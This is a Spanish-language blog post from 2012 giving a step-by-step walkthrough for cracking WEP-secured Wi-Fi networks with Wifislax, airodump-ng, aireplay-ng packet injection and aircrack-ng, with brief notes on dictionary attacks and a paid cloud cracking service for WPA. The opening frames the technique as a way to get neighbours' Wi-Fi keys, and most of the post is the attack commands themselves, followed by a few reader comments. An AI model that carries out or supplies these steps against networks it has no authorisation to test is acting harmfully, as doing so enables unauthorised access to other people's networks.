feb
17
2012

Crackeando redes WEB

Ultimamente esta muy de moda el tema de la seguridad WEB y WPA de hecho incluso desde el movil tenemos multitud de herramientas para sacar claves wifi de los vecinos, sin ir mas lejos
el otro dia mi hermana pequeña de 17 años le pedí la clave wifi de mi padre ya que fui a comer paella y me contestó no la se pero un momento y la saco…
uso un programa de android wifipass y me canto la clave al momento, con esto vengo a decir hay infinidad de formas yo desde el iphone tambien tengo herramientas de la misma clase, pero hoy
voy a explicar la forma desde pc linux por supuesto!!

pasos necesarios para crackear una red con seguridad  WEP :

  1. Arrancar el sistema desde el CD de Wifislax
  2. Validarse como usuario root y password toor
  3. Arrancar el entorno gráfico (startx)
  4. En este paso si no reconoce la tarjeta de red buscarla en la ruta asistencia chipset si la tarjeta es intel en el entorno grafico menu de inicio/wifislax/Asistencia chipset/Asistencia intel Pro Wireless/Recargar modulo ipw2200. Este módulo vale para las Intel 2200 y 2915.
  5. Verificar con ifconfig que se haya creado el interface nuevo (suele ser rtap0, o eth0)
  6. Ponernos a sniffar: airodump-ng -w /tmp/ficherocaptura eth0
  7. Con “iwlist scan”, o en la salida del airodump-ng, podremos ver los datos de la red. Apuntar el nombre del SSID, el CANAL y la MAC
  8. Configurar la red wifi (aunque como no sabemos la clave pondremos cualquiera): iwconfig wlan0 essid “SSID_DE_LA_RED” channel CANAL_DE_LA_RED key 1234567890 (wlan0 es en mi equipo, en el vuestro podría ser otro, es el interface que se crea con la tarjeta wifi).
  9. Empezar a inyectar paquetes: aireplay-ng -3 -x 1024 -b MAC_DE_LA_RED -h MAC_NUESTRA -i rtap0 wlan0
  10. Si la red tiene algo de tráfico empezarán a subir el número de ARP requests, cuando tengamos unos 30000 podemos  pasar al siguiente paso
  11. aircrack-ng -z /tmp/ficherocaptura-01.cap
  12. Si todo va bien nos dara la clave si no hacer capturas de 50000

Para redes WPA se usa fuerza bruta lo cual se usan diccionarios, solo es necesario capturar un paquete handshake.

Para WPA2 o WPA Otro metodo seria con el paquete conseguido entrar en la web de  www.Cloudcracker.com pagar 17$  y en 20 minutos consigues la clave. ;)

Related Posts

Enlace corto

About the Author:

3 Comments + Add Comment

  • Veo k sigues vivo, me alegro de que sigas kon lo tuyo jejejeje, un abrazo amigo

    • Si, para variar dando guerra jejeje

  • ¿Qué herramientas pueden hacer lo mismo desde el iPhone?. Gracias.

Leave a comment

Contador